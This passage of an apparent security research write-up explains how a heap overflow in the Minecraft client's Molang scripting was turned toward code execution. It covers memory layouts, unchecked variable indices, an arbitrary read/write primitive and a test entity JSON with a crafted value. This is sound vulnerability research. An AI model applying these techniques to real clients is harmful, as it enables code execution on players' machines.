variable_name_hash;\n",{"type":24,"tag":301,"props":5755,"children":5756},{"class":303,"line":401},[5757],{"type":24,"tag":301,"props":5758,"children":5759},{"style":359},[5760],{"type":30,"value":5761}," std::string variable_name;\n",{"type":24,"tag":301,"props":5763,"children":5764},{"class":303,"line":415},[5765],{"type":24,"tag":301,"props":5766,"children":5767},{"style":359},[5768],{"type":30,"value":3085},{"type":24,"tag":301,"props":5770,"children":5771},{"class":303,"line":439},[5772],{"type":24,"tag":301,"props":5773,"children":5774},{"style":359},[5775],{"type":30,"value":649},{"type":24,"tag":301,"props":5777,"children":5778},{"class":303,"line":447},[5779,5783],{"type":24,"tag":301,"props":5780,"children":5781},{"style":348},[5782],{"type":30,"value":5735},{"type":24,"tag":301,"props":5784,"children":5785},{"style":359},[5786],{"type":30,"value":5787}," MolangScriptArg {\n",{"type":24,"tag":301,"props":5789,"children":5790},{"class":303,"line":476},[5791,5796],{"type":24,"tag":301,"props":5792,"children":5793},{"style":348},[5794],{"type":30,"value":5795}," uint32_t",{"type":24,"tag":301,"props":5797,"children":5798},{"style":359},[5799],{"type":30,"value":5800}," value_type;\n",{"type":24,"tag":301,"props":5802,"children":5803},{"class":303,"line":495},[5804,5808],{"type":24,"tag":301,"props":5805,"children":5806},{"style":348},[5807],{"type":30,"value":5748},{"type":24,"tag":301,"props":5809,"children":5810},{"style":359},[5811],{"type":30,"value":5812}," value;\n",{"type":24,"tag":301,"props":5814,"children":5815},{"class":303,"line":504},[5816,5821,5825,5829,5834,5838],{"type":24,"tag":301,"props":5817,"children":5818},{"style":359},[5819],{"type":30,"value":5820}," std::vector",{"type":24,"tag":301,"props":5822,"children":5823},{"style":385},[5824],{"type":30,"value":1849},{"type":24,"tag":301,"props":5826,"children":5827},{"style":348},[5828],{"type":30,"value":3010},{"type":24,"tag":301,"props":5830,"children":5831},{"style":359},[5832],{"type":30,"value":5833}," MolangScriptArg",{"type":24,"tag":301,"props":5835,"children":5836},{"style":385},[5837],{"type":30,"value":1456},{"type":24,"tag":301,"props":5839,"children":5840},{"style":359},[5841],{"type":30,"value":5842}," struct_fields;\n",{"type":24,"tag":301,"props":5844,"children":5845},{"class":303,"line":512},[5846],{"type":24,"tag":301,"props":5847,"children":5848},{"style":359},[5849],{"type":30,"value":5850}," \n",{"type":24,"tag":301,"props":5852,"children":5853},{"class":303,"line":592},[5854],{"type":24,"tag":301,"props":5855,"children":5856},{"style":359},[5857],{"type":30,"value":5858}," [...]\n",{"type":24,"tag":301,"props":5860,"children":5861},{"class":303,"line":619},[5862],{"type":24,"tag":301,"props":5863,"children":5864},{"style":359},[5865],{"type":30,"value":3085},{"type":24,"tag":301,"props":5867,"children":5868},{"class":303,"line":635},[5869],{"type":24,"tag":301,"props":5870,"children":5871},{"style":359},[5872],{"type":30,"value":3118},{"type":24,"tag":32,"props":5874,"children":5875},{},[5876,5878,5883],{"type":30,"value":5877},"In memory a ",{"type":24,"tag":145,"props":5879,"children":5881},{"className":5880},[],[5882],{"type":30,"value":5699},{"type":30,"value":5884}," instance resembles:",{"type":24,"tag":291,"props":5886,"children":5888},{"code":5887}," +---------------+---------------+\n+0x00 | FNV-1 hash |std::string.buf|\n +---------------+---------------+\n+0x10 |std::string.buf|std::string.len|\n +---------------+---------------+\n+0x20 |std::string.cap| Unknown |\n +-------+-------+---------------+\n+0x30 | Type |Unused |Variable value |\n +-------+-------+---------------+\n+0x40 |std::vector.buf|std::vector.len|\n +---------------+---------------+\n+0x50 |std::vector.cap| Unknown |\n +---------------+---------------+\n | . . . | . . . |\n",[5889],{"type":24,"tag":145,"props":5890,"children":5891},{"__ignoreMap":7},[5892],{"type":30,"value":5887},{"type":24,"tag":32,"props":5894,"children":5895},{},[5896],{"type":30,"value":5897},"For reference, example debugger view of the layout:",{"type":24,"tag":32,"props":5899,"children":5900},{},[5901],{"type":24,"tag":177,"props":5902,"children":5904},{"alt":179,"src":5903},"/posts/minecraft-heap-overflow-to-rce/image8.png",[],{"type":24,"tag":32,"props":5906,"children":5907},{},[5908],{"type":30,"value":5909},"The full structure is larger and contains more fields than shown, but many are irrelevant to the exploit.",{"type":24,"tag":32,"props":5911,"children":5912},{},[5913,5915,5921,5923,5929,5931,5937,5939,5944,5946,5951,5953,5959,5960,5966,5967,5973],{"type":30,"value":5914},"We only care about the ",{"type":24,"tag":145,"props":5916,"children":5918},{"className":5917},[],[5919],{"type":30,"value":5920},"MolangScriptArg",{"type":30,"value":5922}," beginning at offset ",{"type":24,"tag":145,"props":5924,"children":5926},{"className":5925},[],[5927],{"type":30,"value":5928},"0x30",{"type":30,"value":5930}," because it contains variable values. In the screenshot above, the ",{"type":24,"tag":145,"props":5932,"children":5934},{"className":5933},[],[5935],{"type":30,"value":5936},"value_type",{"type":30,"value":5938}," at ",{"type":24,"tag":145,"props":5940,"children":5942},{"className":5941},[],[5943],{"type":30,"value":5928},{"type":30,"value":5945}," is ",{"type":24,"tag":145,"props":5947,"children":5949},{"className":5948},[],[5950],{"type":30,"value":584},{"type":30,"value":5952}," (meaning float), and the ",{"type":24,"tag":145,"props":5954,"children":5956},{"className":5955},[],[5957],{"type":30,"value":5958},"value",{"type":30,"value":5938},{"type":24,"tag":145,"props":5961,"children":5963},{"className":5962},[],[5964],{"type":30,"value":5965},"0x38",{"type":30,"value":5945},{"type":24,"tag":145,"props":5968,"children":5970},{"className":5969},[],[5971],{"type":30,"value":5972},"0xbf2070c8",{"type":30,"value":206},{"type":24,"tag":32,"props":5975,"children":5976},{},[5977,5979,5985,5987,5992,5994,5999,6001,6006,6008,6013,6015,6021],{"type":30,"value":5978},"During assignment, such as ",{"type":24,"tag":145,"props":5980,"children":5982},{"className":5981},[],[5983],{"type":30,"value":5984},"variable.a = variable.b",{"type":30,"value":5986},", each field of ",{"type":24,"tag":145,"props":5988,"children":5990},{"className":5989},[],[5991],{"type":30,"value":5920},{"type":30,"value":5993}," is copied from variable ",{"type":24,"tag":145,"props":5995,"children":5997},{"className":5996},[],[5998],{"type":30,"value":5613},{"type":30,"value":6000}," to ",{"type":24,"tag":145,"props":6002,"children":6004},{"className":6003},[],[6005],{"type":30,"value":188},{"type":30,"value":6007},". Interestingly, the ",{"type":24,"tag":145,"props":6009,"children":6011},{"className":6010},[],[6012],{"type":30,"value":5958},{"type":30,"value":6014}," field is always copied as a ",{"type":24,"tag":145,"props":6016,"children":6018},{"className":6017},[],[6019],{"type":30,"value":6020},"uint64_t",{"type":30,"value":6022}," even if the type is a 32-bit float.",{"type":24,"tag":32,"props":6024,"children":6025},{},[6026,6028,6034],{"type":30,"value":6027},"Each entity stores its variables in a per-entity vector called ",{"type":24,"tag":145,"props":6029,"children":6031},{"className":6030},[],[6032],{"type":30,"value":6033},"MolangVariableMap",{"type":30,"value":206},{"type":24,"tag":270,"props":6036,"children":6038},{"id":6037},"molangvariablemap",[6039],{"type":30,"value":6033},{"type":24,"tag":32,"props":6041,"children":6042},{},[6043,6048,6050,6056,6058,6064],{"type":24,"tag":145,"props":6044,"children":6046},{"className":6045},[],[6047],{"type":30,"value":6033},{"type":30,"value":6049}," is simply a ",{"type":24,"tag":145,"props":6051,"children":6053},{"className":6052},[],[6054],{"type":30,"value":6055},"std::vector\u003CMolangVariable *>",{"type":30,"value":6057}," contained per entity. To reason about its memory we need to recall MSVC ",{"type":24,"tag":145,"props":6059,"children":6061},{"className":6060},[],[6062],{"type":30,"value":6063},"std::vector",{"type":30,"value":6065}," layout:",{"type":24,"tag":291,"props":6067,"children":6069},{"code":6068,"language":294,"meta":7,"className":295,"style":7},"struct vector {\n void *buf;\n void *len;\n void *cap;\n};\n",[6070],{"type":24,"tag":145,"props":6071,"children":6072},{"__ignoreMap":7},[6073,6085,6102,6118,6134],{"type":24,"tag":301,"props":6074,"children":6075},{"class":303,"line":304},[6076,6080],{"type":24,"tag":301,"props":6077,"children":6078},{"style":348},[6079],{"type":30,"value":3010},{"type":24,"tag":301,"props":6081,"children":6082},{"style":359},[6083],{"type":30,"value":6084}," vector {\n",{"type":24,"tag":301,"props":6086,"children":6087},{"class":303,"line":320},[6088,6093,6097],{"type":24,"tag":301,"props":6089,"children":6090},{"style":348},[6091],{"type":30,"value":6092}," void",{"type":24,"tag":301,"props":6094,"children":6095},{"style":385},[6096],{"type":30,"value":431},{"type":24,"tag":301,"props":6098,"children":6099},{"style":359},[6100],{"type":30,"value":6101},"buf;\n",{"type":24,"tag":301,"props":6103,"children":6104},{"class":303,"line":335},[6105,6109,6113],{"type":24,"tag":301,"props":6106,"children":6107},{"style":348},[6108],{"type":30,"value":6092},{"type":24,"tag":301,"props":6110,"children":6111},{"style":385},[6112],{"type":30,"value":431},{"type":24,"tag":301,"props":6114,"children":6115},{"style":359},[6116],{"type":30,"value":6117},"len;\n",{"type":24,"tag":301,"props":6119,"children":6120},{"class":303,"line":344},[6121,6125,6129],{"type":24,"tag":301,"props":6122,"children":6123},{"style":348},[6124],{"type":30,"value":6092},{"type":24,"tag":301,"props":6126,"children":6127},{"style":385},[6128],{"type":30,"value":431},{"type":24,"tag":301,"props":6130,"children":6131},{"style":359},[6132],{"type":30,"value":6133},"cap;\n",{"type":24,"tag":301,"props":6135,"children":6136},{"class":303,"line":401},[6137],{"type":24,"tag":301,"props":6138,"children":6139},{"style":359},[6140],{"type":30,"value":3118},{"type":24,"tag":32,"props":6142,"children":6143},{},[6144,6149,6151,6157,6159,6165,6167,6172,6173,6178],{"type":24,"tag":145,"props":6145,"children":6147},{"className":6146},[],[6148],{"type":30,"value":3129},{"type":30,"value":6150}," points to the allocated array of elements, ",{"type":24,"tag":145,"props":6152,"children":6154},{"className":6153},[],[6155],{"type":30,"value":6156},"len",{"type":30,"value":6158}," points just past the last used element, and ",{"type":24,"tag":145,"props":6160,"children":6162},{"className":6161},[],[6163],{"type":30,"value":6164},"cap",{"type":30,"value":6166}," points to the end of the allocated buffer. Notably, the types of ",{"type":24,"tag":145,"props":6168,"children":6170},{"className":6169},[],[6171],{"type":30,"value":6156},{"type":30,"value":2378},{"type":24,"tag":145,"props":6174,"children":6176},{"className":6175},[],[6177],{"type":30,"value":6164},{"type":30,"value":6179}," aren't typical integer types for sizes, but both are pointers.",{"type":24,"tag":32,"props":6181,"children":6182},{},[6183],{"type":30,"value":6184},"Example layout for a vector holding three variable pointers plus one unused slot:",{"type":24,"tag":291,"props":6186,"children":6188},{"code":6187},"+---------+ +--------------------+\n| buf +-------> | MolangVariable A* |\n+---------+ +--------------------+\n| len +----+ | MolangVariable B* |\n+---------+ | +--------------------+\n| cap | | | MolangVariable C* |\n+----+----+ | +--------------------+\n | +--> | Empty element slot |\n | +--------------------+\n | ^\n +-----------------------------------+\n",[6189],{"type":24,"tag":145,"props":6190,"children":6191},{"__ignoreMap":7},[6192],{"type":30,"value":6187},{"type":24,"tag":32,"props":6194,"children":6195},{},[6196,6198,6204,6206,6212],{"type":30,"value":6197},"Because each entity can create and initialize variables independently, the indices of specific variables (e.g., ",{"type":24,"tag":145,"props":6199,"children":6201},{"className":6200},[],[6202],{"type":30,"value":6203},"variable.result",{"type":30,"value":6205},") may differ between entities. To get around this, ",{"type":24,"tag":145,"props":6207,"children":6209},{"className":6208},[],[6210],{"type":30,"value":6211},"MolangIndexMap",{"type":30,"value":6213}," is used to map a global variable name to the correct per-entity slot.",{"type":24,"tag":270,"props":6215,"children":6217},{"id":6216},"molangindexmap",[6218],{"type":30,"value":6211},{"type":24,"tag":32,"props":6220,"children":6221},{},[6222,6227,6229,6235,6237,6243],{"type":24,"tag":145,"props":6223,"children":6225},{"className":6224},[],[6226],{"type":30,"value":6211},{"type":30,"value":6228}," is a per-entity ",{"type":24,"tag":145,"props":6230,"children":6232},{"className":6231},[],[6233],{"type":30,"value":6234},"std::vector\u003Cuint16_t>",{"type":30,"value":6236},". The engine maintains a global hashmap that maps variable names to a global index. When the client encounters a statement like ",{"type":24,"tag":145,"props":6238,"children":6240},{"className":6239},[],[6241],{"type":30,"value":6242},"variable.result = 0",{"type":30,"value":6244}," it:",{"type":24,"tag":6246,"props":6247,"children":6248},"ol",{},[6249,6259,6269],{"type":24,"tag":2659,"props":6250,"children":6251},{},[6252,6254],{"type":30,"value":6253},"Checks the global hashmap for ",{"type":24,"tag":145,"props":6255,"children":6257},{"className":6256},[],[6258],{"type":30,"value":5599},{"type":24,"tag":2659,"props":6260,"children":6261},{},[6262,6264],{"type":30,"value":6263},"If found, uses the global index to look up the per-entity index in ",{"type":24,"tag":145,"props":6265,"children":6267},{"className":6266},[],[6268],{"type":30,"value":6211},{"type":24,"tag":2659,"props":6270,"children":6271},{},[6272,6274],{"type":30,"value":6273},"If not found, creates a new global entry and assigns it ",{"type":24,"tag":145,"props":6275,"children":6277},{"className":6276},[],[6278],{"type":30,"value":6279},"last_index + 1",{"type":24,"tag":32,"props":6281,"children":6282},{},[6283,6285,6290,6292,6297,6299,6304,6306,6311,6313,6318,6320,6326,6328,6333],{"type":30,"value":6284},"This means the same global index for variable ",{"type":24,"tag":145,"props":6286,"children":6288},{"className":6287},[],[6289],{"type":30,"value":5599},{"type":30,"value":6291}," maps to the same position inside every entity’s ",{"type":24,"tag":145,"props":6293,"children":6295},{"className":6294},[],[6296],{"type":30,"value":6211},{"type":30,"value":6298},", but the actual ",{"type":24,"tag":145,"props":6300,"children":6302},{"className":6301},[],[6303],{"type":30,"value":5699},{"type":30,"value":6305}," for ",{"type":24,"tag":145,"props":6307,"children":6309},{"className":6308},[],[6310],{"type":30,"value":5599},{"type":30,"value":6312}," may live at different slots inside each entity's ",{"type":24,"tag":145,"props":6314,"children":6316},{"className":6315},[],[6317],{"type":30,"value":6033},{"type":30,"value":6319},". ",{"type":24,"tag":145,"props":6321,"children":6323},{"className":6322},[],[6324],{"type":30,"value":6325},"Entity.MolangIndexMap[global_index]",{"type":30,"value":6327}," stores the per-entity index (slot) of variable ",{"type":24,"tag":145,"props":6329,"children":6331},{"className":6330},[],[6332],{"type":30,"value":5599},{"type":30,"value":206},{"type":24,"tag":32,"props":6335,"children":6336},{},[6337,6339,6344,6346,6351,6353,6358,6360,6365,6367,6373,6375,6380],{"type":30,"value":6338},"Importantly, we found that indices in the ",{"type":24,"tag":145,"props":6340,"children":6342},{"className":6341},[],[6343],{"type":30,"value":6211},{"type":30,"value":6345}," are trusted and the client does not validate that a per-entity index actually lies within the bounds of that entity’s ",{"type":24,"tag":145,"props":6347,"children":6349},{"className":6348},[],[6350],{"type":30,"value":6033},{"type":30,"value":6352},". This means that if we overwrite the index of variable ",{"type":24,"tag":145,"props":6354,"children":6356},{"className":6355},[],[6357],{"type":30,"value":5599},{"type":30,"value":6359}," (an example, it can be any variable) with the chunk overlap and make it out-of-bounds for that entity’s ",{"type":24,"tag":145,"props":6361,"children":6363},{"className":6362},[],[6364],{"type":30,"value":6033},{"type":30,"value":6366},", we could read from and write to ",{"type":24,"tag":145,"props":6368,"children":6370},{"className":6369},[],[6371],{"type":30,"value":6372},"address + 0x38",{"type":30,"value":6374}," through ",{"type":24,"tag":145,"props":6376,"children":6378},{"className":6377},[],[6379],{"type":30,"value":6203},{"type":30,"value":206},{"type":24,"tag":80,"props":6382,"children":6384},{"id":6383},"building-a-molang-arbitrary-rw-primitive",[6385],{"type":30,"value":6386},"Building a Molang Arbitrary R/W Primitive",{"type":24,"tag":32,"props":6388,"children":6389},{},[6390,6392,6397,6399,6404],{"type":30,"value":6391},"We needed some pointer inside a heap-sprayable object that we could use to build an arbitrary read/write primitive in Molang. Eventually, we came up with the thought of using internal pointers of ",{"type":24,"tag":145,"props":6393,"children":6395},{"className":6394},[],[6396],{"type":30,"value":6063},{"type":30,"value":6398}," - specifically, of ",{"type":24,"tag":145,"props":6400,"children":6402},{"className":6401},[],[6403],{"type":30,"value":6033},{"type":30,"value":6405}," vector.",{"type":24,"tag":32,"props":6407,"children":6408},{},[6409,6411,6416,6418,6423,6425,6430,6432,6437],{"type":30,"value":6410},"Because every entity object is heap-allocated and contains a ",{"type":24,"tag":145,"props":6412,"children":6414},{"className":6413},[],[6415],{"type":30,"value":6033},{"type":30,"value":6417}," vector, we realised we might be able to overwrite a variable index so it reads the ",{"type":24,"tag":145,"props":6419,"children":6421},{"className":6420},[],[6422],{"type":30,"value":3129},{"type":30,"value":6424}," pointer of the ",{"type":24,"tag":145,"props":6426,"children":6428},{"className":6427},[],[6429],{"type":30,"value":6033},{"type":30,"value":6431}," vector belonging to an entity object placed just next the ",{"type":24,"tag":145,"props":6433,"children":6435},{"className":6434},[],[6436],{"type":30,"value":6033},{"type":30,"value":6438}," allocated buffer.",{"type":24,"tag":291,"props":6440,"children":6442},{"code":6441}," +-------------+ \u003C--+ \n+---> | variable.a | | \n| +-------------+ | \n| | variable.b | | \n| +-------------+ +- MolangVariableMap allocated buffer\n| | . . . | | \n| +-------------+ | \n| | variable.f | | \n| +-------------+ \u003C--+--+ \n| | | | \n| | | | \n| | | | \n| | | | \n| +------+------+ +- Entity Object \n+-----+ buf | len | | \n +------+------+ | \n | cap | | | \n +------+ | | \n +-------------+ \u003C-----+ \n",[6443],{"type":24,"tag":145,"props":6444,"children":6445},{"__ignoreMap":7},[6446],{"type":30,"value":6441},{"type":24,"tag":32,"props":6448,"children":6449},{},[6450,6452,6457,6459,6465,6467,6472,6473,6479,6480,6485,6487,6492,6494,6499,6501,6506,6508,6513,6515,6520,6522,6527,6529,6535,6537,6542,6544,6549],{"type":30,"value":6451},"In the scenario above, the ",{"type":24,"tag":145,"props":6453,"children":6455},{"className":6454},[],[6456],{"type":30,"value":6211},{"type":30,"value":6458}," would map ",{"type":24,"tag":145,"props":6460,"children":6462},{"className":6461},[],[6463],{"type":30,"value":6464},"variable.a",{"type":30,"value":6466}," -> index ",{"type":24,"tag":145,"props":6468,"children":6470},{"className":6469},[],[6471],{"type":30,"value":584},{"type":30,"value":377},{"type":24,"tag":145,"props":6474,"children":6476},{"className":6475},[],[6477],{"type":30,"value":6478},"variable.b",{"type":30,"value":6466},{"type":24,"tag":145,"props":6481,"children":6483},{"className":6482},[],[6484],{"type":30,"value":546},{"type":30,"value":6486},", and so on. If we overwrite the index for ",{"type":24,"tag":145,"props":6488,"children":6490},{"className":6489},[],[6491],{"type":30,"value":6464},{"type":30,"value":6493}," with a value that is out-of-bounds for the ",{"type":24,"tag":145,"props":6495,"children":6497},{"className":6496},[],[6498],{"type":30,"value":6033},{"type":30,"value":6500},", it can instead index the ",{"type":24,"tag":145,"props":6502,"children":6504},{"className":6503},[],[6505],{"type":30,"value":3129},{"type":30,"value":6507}," field of the entity object above. Reading ",{"type":24,"tag":145,"props":6509,"children":6511},{"className":6510},[],[6512],{"type":30,"value":6464},{"type":30,"value":6514}," will then return the pointer stored at offset ",{"type":24,"tag":145,"props":6516,"children":6518},{"className":6517},[],[6519],{"type":30,"value":5965},{"type":30,"value":6521}," from the start of the ",{"type":24,"tag":145,"props":6523,"children":6525},{"className":6524},[],[6526],{"type":30,"value":6033},{"type":30,"value":6528}," (which in this diagram corresponds to ",{"type":24,"tag":145,"props":6530,"children":6532},{"className":6531},[],[6533],{"type":30,"value":6534},"variable.f",{"type":30,"value":6536},"), and writing to ",{"type":24,"tag":145,"props":6538,"children":6540},{"className":6539},[],[6541],{"type":30,"value":6464},{"type":30,"value":6543}," will overwrite that pointer - corrupting ",{"type":24,"tag":145,"props":6545,"children":6547},{"className":6546},[],[6548],{"type":30,"value":6534},{"type":30,"value":206},{"type":24,"tag":32,"props":6551,"children":6552},{},[6553,6555,6560,6561,6567,6569,6574,6576,6582,6584,6589,6591,6596,6598,6604,6606,6612,6614,6619],{"type":30,"value":6554},"To leak the address of the Minecraft executable we could increment ",{"type":24,"tag":145,"props":6556,"children":6558},{"className":6557},[],[6559],{"type":30,"value":6464},{"type":30,"value":873},{"type":24,"tag":145,"props":6562,"children":6564},{"className":6563},[],[6565],{"type":30,"value":6566},"variable.a += 8",{"type":30,"value":6568},"), which advances the pointer used for ",{"type":24,"tag":145,"props":6570,"children":6572},{"className":6571},[],[6573],{"type":30,"value":6534},{"type":30,"value":6575}," by 8 bytes. The Molang script would repeat this until it finds a vtable pointer in the heap. At that point we can write arbitrary values into writable regions of the Minecraft process by setting ",{"type":24,"tag":145,"props":6577,"children":6579},{"className":6578},[],[6580],{"type":30,"value":6581},"variable.a = variable.exe_leak + \u003Coffset>",{"type":30,"value":6583}," - this updates the ",{"type":24,"tag":145,"props":6585,"children":6587},{"className":6586},[],[6588],{"type":30,"value":6534},{"type":30,"value":6590}," pointer to our chosen address, and writing to ",{"type":24,"tag":145,"props":6592,"children":6594},{"className":6593},[],[6595],{"type":30,"value":6534},{"type":30,"value":6597},", for example ",{"type":24,"tag":145,"props":6599,"children":6601},{"className":6600},[],[6602],{"type":30,"value":6603},"variable.f = 1337",{"type":30,"value":6605},", writes the value ",{"type":24,"tag":145,"props":6607,"children":6609},{"className":6608},[],[6610],{"type":30,"value":6611},"1337",{"type":30,"value":6613}," to offset ",{"type":24,"tag":145,"props":6615,"children":6617},{"className":6616},[],[6618],{"type":30,"value":5965},{"type":30,"value":6620}," from that calculated address.",{"type":24,"tag":270,"props":6622,"children":6624},{"id":6623},"testing-the-idea",[6625],{"type":30,"value":6626},"Testing the Idea",{"type":24,"tag":32,"props":6628,"children":6629},{},[6630,6632,6637,6639,6644,6646,6651],{"type":30,"value":6631},"We tested the idea by manually adding a pointer to the start of ",{"type":24,"tag":145,"props":6633,"children":6635},{"className":6634},[],[6636],{"type":30,"value":6033},{"type":30,"value":6638}," and modifying the index of a variable so that it indexed this out-of-bounds pointer. It ",{"type":24,"tag":5422,"props":6640,"children":6641},{},[6642],{"type":30,"value":6643},"almost",{"type":30,"value":6645}," worked - below is the state of the ",{"type":24,"tag":145,"props":6647,"children":6649},{"className":6648},[],[6650],{"type":30,"value":6033},{"type":30,"value":6652},"'s allocated buffer before the Molang script executes:",{"type":24,"tag":32,"props":6654,"children":6655},{},[6656],{"type":24,"tag":177,"props":6657,"children":6659},{"alt":179,"src":6658},"/posts/minecraft-heap-overflow-to-rce/image9.png",[],{"type":24,"tag":32,"props":6661,"children":6662},{},[6663],{"type":30,"value":6664},"And this is after execution:",{"type":24,"tag":32,"props":6666,"children":6667},{},[6668],{"type":24,"tag":177,"props":6669,"children":6671},{"alt":179,"src":6670},"/posts/minecraft-heap-overflow-to-rce/image10.png",[],{"type":24,"tag":32,"props":6673,"children":6674},{},[6675],{"type":30,"value":6676},"For reference, this is what the relevant entity json file containing our Molang looks like:",{"type":24,"tag":291,"props":6678,"children":6682},{"code":6679,"language":6680,"meta":7,"className":6681,"style":7},"{\n \"format_version\": \"1.10.0\",\n \"minecraft:client_entity\": {\n \"description\": {\n \"identifier\": \"minecraft:leash_knot\",\n\n [...]\n \n \"scripts\": {\n \"initialize\": [\n \"variable.a = 0;\",\n \"variable.b = 0;\",\n \"variable.c = 0;\",\n [...]\n ],\n \"pre_animation\": [\n \"variable.a = 2.310732e-27;\"\n ]\n },\n }\n }\n}\n","json","language-json shiki shiki-themes slack-dark",[6683],{"type":24,"tag":145,"props":6684,"children":6685},{"__ignoreMap":7},[6686,6693,6714,6727,6739,6760,6767,6776,6783,6795,6808,6820,6832,6844,6860,6868,6880,6888,6896,6904,6911,6919],{"type":24,"tag":301,"props":6687,"children":6688},{"class":303,"line":304},[6689],{"type":24,"tag":301,"props":6690,"children":6691},{"style":359},[6692],{"type":30,"value":799},{"type":24,"tag":301,"props":6694,"children":6695},{"class":303,"line":320},[6696,6701,6705,6710],{"type":24,"tag":301,"props":6697,"children":6698},{"style":369},[6699],{"type":30,"value":6700}," \"format_version\"",{"type":24,"tag":301,"props":6702,"children":6703},{"style":359},[6704],{"type":30,"value":5615},{"type":24,"tag":301,"props":6706,"children":6707},{"style":329},[6708],{"type":30,"value":6709},"\"1.10.0\"",{"type":24,"tag":301,"props":6711,"children":6712},{"style":359},[6713],{"type":30,"value":1729},{"type":24,"tag":301,"props":6715,"children":6716},{"class":303,"line":335},[6717,6722],{"type":24,"tag":301,"props":6718,"children":6719},{"style":369},[6720],{"type":30,"value":6721}," \"minecraft:client_entity\"",{"type":24,"tag":301,"props":6723,"children":6724},{"style":359},[6725],{"type":30,"value":6726},": {\n",{"type":24,"tag":301,"props":6728,"children":6729},{"class":303,"line":344},[6730,6735],{"type":24,"tag":301,"props":6731,"children":6732},{"style":369},[6733],{"type":30,"value":6734}," \"description\"",{"type":24,"tag":301,"props":6736,"children":6737},{"style":359},[6738],{"type":30,"value":6726},{"type":24,"tag":301,"props":6740,"children":6741},{"class":303,"line":401},[6742,6747,6751,6756],{"type":24,"tag":301,"props":6743,"children":6744},{"style":369},[6745],{"type":30,"value":6746}," \"identifier\"",{"type":24,"tag":301,"props":6748,"children":6749},{"style":359},[6750],{"type":30,"value":5615},{"type":24,"tag":301,"props":6752,"children":6753},{"style":329},[6754],{"type":30,"value":6755},"\"minecraft:leash_knot\"",{"type":24,"tag":301,"props":6757,"children":6758},{"style":359},[6759],{"type":30,"value":1729},{"type":24,"tag":301,"props":6761,"children":6762},{"class":303,"line":415},[6763],{"type":24,"tag":301,"props":6764,"children":6765},{"emptyLinePlaceholder":16},[6766],{"type":30,"value":341},{"type":24,"tag":301,"props":6768,"children":6769},{"class":303,"line":439},[6770],{"type":24,"tag":301,"props":6771,"children":6773},{"style":6772},"--shiki-default:#F44747",[6774],{"type":30,"value":6775}," [...]\n",{"type":24,"tag":301,"props":6777,"children":6778},{"class":303,"line":447},[6779],{"type":24,"tag":301,"props":6780,"children":6781},{"style":359},[6782],{"type":30,"value":5850},{"type":24,"tag":301,"props":6784,"children":6785},{"class":303,"line":476},[6786,6791],{"type":24,"tag":301,"props":6787,"children":6788},{"style":369},[6789],{"type":30,"value":6790}," \"scripts\"",{"type":24,"tag":301,"props":6792,"children":6793},{"style":359},[6794],{"type":30,"value":6726},{"type":24,"tag":301,"props":6796,"children":6797},{"class":303,"line":495},[6798,6803],{"type":24,"tag":301,"props":6799,"children":6800},{"style":369},[6801],{"type":30,"value":6802}," \"initialize\"",{"type":24,"tag":301,"props":6804,"children":6805},{"style":359},[6806],{"type":30,"value":6807},": [\n",{"type":24,"tag":301,"props":6809,"children":6810},{"class":303,"line":504},[6811,6816],{"type":24,"tag":301,"props":6812,"children":6813},{"style":329},[6814],{"type":30,"value":6815}," \"variable.a = 0;\"",{"type":24,"tag":301,"props":6817,"children":6818},{"style":359},[6819],{"type":30,"value":1729},{"type":24,"tag":301,"props":6821,"children":6822},{"class":303,"line":512},[6823,6828],{"type":24,"tag":301,"props":6824,"children":6825},{"style":329},[6826],{"type":30,"value":6827}," \"variable.b = 0;\"",{"type":24,"tag":301,"props":6829,"children":6830},{"style":359},[6831],{"type":30,"value":1729},{"type":24,"tag":301,"props":6833,"children":6834},{"class":303,"line":592},[6835,6840],{"type":24,"tag":301,"props":6836,"children":6837},{"style":329},[6838],{"type":30,"value":6839}," \"variable.c = 0;\"",{"type":24,"tag":301,"props":6841,"children":6842},{"style":359},[6843],{"type":30,"value":1729},{"type":24,"tag":301,"props":6845,"children":6846},{"class":303,"line":619},[6847,6852,6856],{"type":24,"tag":301,"props":6848,"children":6849},{"style":359},[6850],{"type":30,"value":6851}," [",{"type":24,"tag":301,"props":6853,"children":6854},{"style":6772},[6855],{"type":30,"value":4054},{"type":24,"tag":301,"props":6857,"children":6858},{"style":359},[6859],{"type":30,"value":4059},{"type":24,"tag":301,"props":6861,"children":6862},{"class":303,"line":635},[6863],{"type":24,"tag":301,"props":6864,"children":6865},{"style":359},[6866],{"type":30,"value":6867}," ],\n",{"type":24,"tag":301,"props":6869,"children":6870},{"class":303,"line":643},[6871,6876],{"type":24,"tag":301,"props":6872,"children":6873},{"style":369},[6874],{"type":30,"value":6875}," \"pre_animation\"",{"type":24,"tag":301,"props":6877,"children":6878},{"style":359},[6879],{"type":30,"value":6807},{"type":24,"tag":301,"props":6881,"children":6882},{"class":303,"line":652},[6883],{"type":24,"tag":301,"props":6884,"children":6885},{"style":329},[6886],{"type":30,"value":6887}," \"variable.a = 2.310732e-27;\"\n",{"type":24,"tag":301,"props":6889,"children":6890},{"class":303,"line":666},[6891],{"type":24,"tag":301,"props":6892,"children":6893},{"style":359},[6894],{"type":30,"value":6895}," ]\n",{"type":24,"tag":301,"props":6897,"children":6898},{"class":303,"line":674},[6899],{"type":24,"tag":301,"props":6900,"children":6901},{"style":359},[6902],{"type":30,"value":6903}," },\n",{"type":24,"tag":301,"props":6905,"children":6906},{"class":303,"line":692},[6907],{"type":24,"tag":301,"props":6908,"children":6909},{"style":359},[6910],{"type":30,"value":501},{"type":24,"tag":301,"props":6912,"children":6913},{"class":303,"line":3631},[6914],{"type":24,"tag":301,"props":6915,"children":6916},{"style":359},[6917],{"type":30,"value":6918}," }\n",{"type":24,"tag":301,"props":6920,"children":6921},{"class":303,"line":3639},[6922],{"type":24,"tag":301,"props":6923,"children":6924},{"style":359},[6925],{"type":30,"value":698},{"type":24,"tag":32,"props":6927,"children":6928},{},[6929,6931,6936,6938,6943,6945,6950],{"type":30,"value":6930},"As shown, the pointer of a variable at offset ",{"type":24,"tag":145,"props":6932,"children":6934},{"className":6933},[],[6935],{"type":30,"value":5965},{"type":30,"value":6937}," was modified and the core concept works. During ",{"type":24,"tag":145,"props":6939,"children":6941},{"className":6940},[],[6942],{"type":30,"value":5920},{"type":30,"value":6944}," copy, pointers of some other variables above offset ",{"type":24,"tag":145,"props":6946,"children":6948},{"className":6947},[],[6949],{"type":30,"value":5965},{"type":30,"value":6951}," were removed, but this is fine as we control these variables and can simply not update them during execution. However, we discovered other issues with this approach.",{"type":24,"tag":32,"props":6953,"children":6954},{},[6955],{"type":30,"value":6956},"As mentioned earlier, the only number type in Molang is a 32-bit 